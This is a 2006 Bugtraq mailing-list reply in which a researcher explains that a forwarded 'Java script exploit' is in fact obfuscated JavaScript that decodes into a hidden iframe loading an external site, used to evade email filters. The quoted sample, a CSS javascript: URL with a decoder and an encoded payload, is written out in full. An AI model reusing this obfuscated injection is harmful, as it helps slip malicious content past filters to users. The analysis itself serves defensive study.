[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.BSO.4.58.0602180944460.17100@naughty.monkey.org>
Date: Sat, 18 Feb 2006 09:47:23 -0500 (EST)
From: Jose Nazario <jose@...key.org>
To: gandalf@...ital.net
Cc: bugtraq@...urityfocus.com
Subject: Re: Java script exploit
On Fri, 17 Feb 2006 gandalf@...ital.net wrote:
> I just receieved this exploit, I have looked around and all I could find
> lately are the following Java issues: Gentoo Linux Security Advisory
> GLSA 200601-10 - Sun and Blackdown Java: Applet privilege escalation
> I don't have the Java knowledge to figure out what is going on, but it
> doesn't look good.
it's not a javascript exploit, it's obfuscated javascript. basially it
decodes itself to display something along the lines of (tags obscured):
[iframe src=http://badsite/some/dir/stuff] [/iframe]
this can be used to bypass filters that look in your email for known
undesirable sites.
nothing special about it, and no exploit.
> <a target=3D"_blank" href=3D"www.yahoo.com>"style=3D"background:url\(java/**/script:function dc(x){var l=3Dx.length,b=3D1024,i,j,r,p=3D0,s=3D0,w=3D0,t=3DArray(63,6,22,2,4,19,56,49,24,46,0,0,0,0,0,0,61,0,5,58,48,51,17,18,13,16,11,20,27,47,60,53,8,57,14,7,9,55,36,31,1,40,15,0,0,0,0,44,0,33,41,52,62,32,50,28,43,10,21,12,26,42,59,38,39,34,29,23,45,3,37,25,30,35,54);for(j=3DMath.ceil(l/b);j>0;j--){r=3D'';for(i=3DMath.min(l,b);i>0;i--,l--){w|=3D(t[x.charCodeAt(p++)-48])<<s;if(s){r+=3DString.fromCharCode(165^w&255);w>>=3D8;s-=3D2}else{s=3D6}}document.write(r)}}dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT'))">
________
jose nazario, ph.d. jose@...key.org
http://monkey.org/~jose/ http://infosecdaily.net/
http://www.wormblog.com/
Powered by blists - more mailing lists